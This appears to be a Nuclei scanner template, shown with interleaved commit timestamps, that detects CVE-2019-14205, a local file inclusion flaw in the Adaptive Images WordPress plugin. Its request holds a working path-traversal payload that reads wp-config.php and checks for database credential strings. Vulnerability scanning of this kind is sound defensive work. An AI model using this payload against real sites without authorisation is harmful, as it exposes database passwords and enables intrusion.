2021-02-18 01:22:37 +00:00
id : CVE-2019-14205
2022-04-22 10:38:41 +00:00
2021-02-18 01:22:37 +00:00
info :
name : WordPress Ext Adaptive Images LFI
author : pikpikcu
severity : high
2022-04-22 10:38:41 +00:00
description : A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file']
parameter in adaptive-images-script.php.
reference :
- https://github.com/security-kma/EXPLOITING-CVE-2019-14205
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-14205
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,wordpress,wp-plugin,lfi
2021-02-18 01:22:37 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
part : body
2021-02-18 05:39:07 +00:00
condition : and
2021-02-18 01:22:37 +00:00
- type : status
status :
- 200